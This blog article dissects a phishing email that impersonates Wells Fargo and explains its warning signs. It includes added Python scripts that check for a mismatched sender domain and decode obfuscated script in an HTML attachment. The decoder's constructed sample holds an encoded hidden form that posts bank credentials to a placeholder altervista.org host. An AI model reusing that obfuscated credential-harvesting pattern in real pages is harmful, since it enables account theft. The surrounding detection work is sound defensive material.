Anatomy of a Phish
One of our visitors at TheDailyScam.com recently forwarded an email to us that appeared to be from Wells Fargo bank. However, the sender felt that the email was very suspicious. The email came with an attached file named “Case ID-40431.html.” The email and attached HTML file were a very clever and extremely dangerous phishing scam. A phishing scam is a scam in which a fake website has been set up to look like the real website of a financial institution or some other service, such as an Apple account. The scammer hopes to trick the email recipient into entering very personal information such as bank account or Apple ID login information.
In this article, we’ll take this particular scam apart and expose it in layers, starting with the simplest parts and ending with the more complex ones. Our hope is that everyone reading this article will gain some insight into these types of scams and avoid becoming a victim themselves.
Let’s start with the email that appeared to arrive from Wells Fargo:
The woman who received this email does have a Wells Fargo bank account but was suspicious because the sender’s email address contained conflicting information. Though the sender is identified as “Wells Fargo,” the email came from a domain named “surveillancesystem.com.” And what’s up with that firstname.lastname@example.org? It also made our recipient suspicious. If you enter “surveillancesystem.com” into Google, you’ll learn that Google can find no such domain name. (Not to be confused with surveillancesystemS.com.) Even if the domain surveillancesystem.com DID exist, it has nothing to do with Wells Fargo Bank!
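The two warning signs described above (a display name that claims one brand while the address belongs to an unrelated domain, and an HTML file attached to a “bank” notice) can be checked automatically before a message ever reaches an inbox. The following script is an added example for this article, not code from TheDailyScam.com or from Wells Fargo. The sample message is constructed to mirror the one described here, and the brand-to-domain table is an assumption that a real mail filter would fill from its own allow-list.

```python
import email
from email import policy
from email.utils import parseaddr

# Constructed sample message (not the original email): the From display name says
# "Wells Fargo" while the address domain does not match, and an .html file is attached.
SAMPLE_EML = b"""From: "Wells Fargo" <alerts@surveillancesystem.com>
To: customer@example.net
Subject: Your account has been restricted
MIME-Version: 1.0
Content-Type: multipart/mixed; boundary="b1"

--b1
Content-Type: text/plain

Please open the attached case file to complete verification.
--b1
Content-Type: text/html; name="Case ID-40431.html"
Content-Disposition: attachment; filename="Case ID-40431.html"

<html><body>placeholder</body></html>
--b1--
"""

# Brand name (lower-case) -> domains that brand legitimately sends from.
# Assumed table for this example; a deployment would maintain its own list.
BRAND_DOMAINS = {"wells fargo": {"wellsfargo.com"}}


def sender_domain(msg):
    """Return (display_name, address_domain) from the From header, both lower-cased."""
    name, addr = parseaddr(msg.get("From", ""))
    domain = addr.rsplit("@", 1)[-1].lower() if "@" in addr else ""
    return name.strip().lower(), domain


def html_attachments(msg):
    """List attachment filenames ending in .html or .htm (case-insensitive)."""
    names = []
    for part in msg.iter_attachments():
        filename = part.get_filename() or ""
        if filename.lower().endswith((".html", ".htm")):
            names.append(filename)
    return names


def assess(raw_bytes):
    """Return a list of red flags found in a raw RFC 5322 message."""
    msg = email.message_from_bytes(raw_bytes, policy=policy.default)
    flags = []
    name, domain = sender_domain(msg)
    # A display name that invokes a brand should come from that brand's own domain.
    for brand, domains in BRAND_DOMAINS.items():
        if brand in name and domain not in domains:
            flags.append(f"display name claims '{brand}' but address domain is '{domain}'")
    # HTML attachments let a phishing page load locally, bypassing URL-based filters.
    for filename in html_attachments(msg):
        flags.append(f"HTML attachment '{filename}' in a message about an account")
    return flags


if __name__ == "__main__":
    for flag in assess(SAMPLE_EML):
        print("RED FLAG:", flag)
```

The display-name check is deliberately strict: a legitimate bank notice that arrives from a third-party mailer would also be flagged, which is the safer failure for a bank-branded message.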
What we found was a very long web page filled with more than a hundred legitimate links to Wells Fargo bank. However, in the bottom third of the web page was a request to provide the necessary information to complete the “verification process” and unrestrict our restricted bank account. This is what the scammers wanted from us…
What makes this a bit unusual is that someone took the effort to write this in hexadecimal code instead of plain readable characters (called ASCII characters), as if they wanted to hide the intention of this script. We copied the hexadecimal code and pasted it into an online decoder and learned something very important and revealing. [Decoder: http://meyerweb.com/eric/tools/dencoder/]
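The manual step described above, copying the hex-encoded script into a decoder to see where the “verification” form really submits, can be scripted so that an analyst never has to open the attachment in a browser. The following is an added example for this article, not the actual attachment or code from TheDailyScam.com. The sample HTML is constructed: it carries links to the genuine bank site plus a script that writes the hidden form from a `%NN`-encoded string, the same `unescape("%3C%66...")` pattern the decoder link above handles. The hostname in the hidden form is a labelled placeholder standing in for the altervista.org subdomain mentioned later in the article. The decoder handles both `%NN` (URL) and `\xNN` (JavaScript) escapes.

```python
import re
from html.parser import HTMLParser
from urllib.parse import unquote, urlparse


def percent_escape(text):
    """Encode text as %NN sequences; used here only to build the constructed sample."""
    return "".join(f"%{ord(c):02X}" for c in text)


# The form a victim would really submit to. The hostname is a constructed placeholder,
# not the real subdomain used in the attack described by the article.
_HIDDEN_FORM = ('<form action="http://constructed-subdomain.altervista.org/verify.php" '
                'method="post">')

# Constructed stand-in for the attachment (not the real file): visible links point at the
# genuine bank, while a script writes the harvesting form from an encoded string.
SAMPLE_HTML = f"""<html><body>
<a href="https://www.wellsfargo.com/">Sign On</a>
<a href="https://www.wellsfargo.com/privacy-security/">Security Center</a>
<script>document.write(unescape("{percent_escape(_HIDDEN_FORM)}"));</script>
</body></html>"""

JS_HEX = re.compile(r"\\x([0-9a-fA-F]{2})")
# A double- or single-quoted JavaScript string literal, backslash escapes allowed inside.
STRING_LITERAL = re.compile(r'"((?:[^"\\]|\\.)*)"|\'((?:[^\'\\]|\\.)*)\'')


def decode_hex_string(s):
    """Turn \\xNN (JavaScript) and %NN (URL) escapes back into readable characters."""
    s = JS_HEX.sub(lambda m: chr(int(m.group(1), 16)), s)
    return unquote(s)


class LinkCollector(HTMLParser):
    """Collects hosts from <a href> and <form action>, and keeps raw <script> bodies."""

    def __init__(self):
        super().__init__()
        self.link_hosts, self.form_hosts, self.scripts = set(), set(), []
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "a" and a.get("href"):
            self.link_hosts.add(urlparse(a["href"]).hostname or "")
        elif tag == "form" and a.get("action"):
            self.form_hosts.add(urlparse(a["action"]).hostname or "")
        elif tag == "script":
            self._in_script = True

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        # Script bodies are delivered as text, so markup hidden inside them is not
        # parsed on the first pass; keep them for decoding.
        if self._in_script:
            self.scripts.append(data)


def in_domain(host, domain):
    """True if host is the domain itself or a subdomain of it (not a look-alike)."""
    return host == domain or host.endswith("." + domain)


def analyse(html, trusted_domain="wellsfargo.com"):
    """Return link hosts, form-submission hosts, and form hosts outside the trusted domain."""
    p = LinkCollector()
    p.feed(html)
    # Second pass: every string literal inside a script may be markup the script writes
    # into the page, so decode it and parse the result with the same collector.
    for m in STRING_LITERAL.finditer("".join(p.scripts)):
        p.feed(decode_hex_string(m.group(1) or m.group(2) or ""))
    untrusted = {h for h in p.form_hosts if not in_domain(h, trusted_domain)}
    return {
        "link_hosts": sorted(p.link_hosts),
        "form_hosts": sorted(p.form_hosts),
        "untrusted_form_hosts": sorted(untrusted),
    }


if __name__ == "__main__":
    for key, hosts in analyse(SAMPLE_HTML).items():
        print(f"{key}: {hosts}")
```

The point of the two-pass design is exactly the trick the article describes: a page can be full of genuine links and still submit the form somewhere else, and that destination only becomes visible once the script’s string literals are decoded. Any form host outside the bank’s own domain is the thing to look at first.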
We entered the domain, “altervista.org” into a Google search field to see what Google might tell us and we weren’t the least bit surprised to see many Google returns referring to this domain as a known phishing site.
Clean-MX.com even had a long list of identified phishing attacks listed as coming from various subdomains of the website Altervista.org. (The subdomain is the name that appears in front of “altervista.org” and separated by a period.)
Like we said at the beginning of this article… this was a very, very dangerous phishing email. This kind of phishing trick can cost someone everything he or she has in bank accounts, and can lead to identity theft and a ruined credit history.
Just delete. Safe surfing!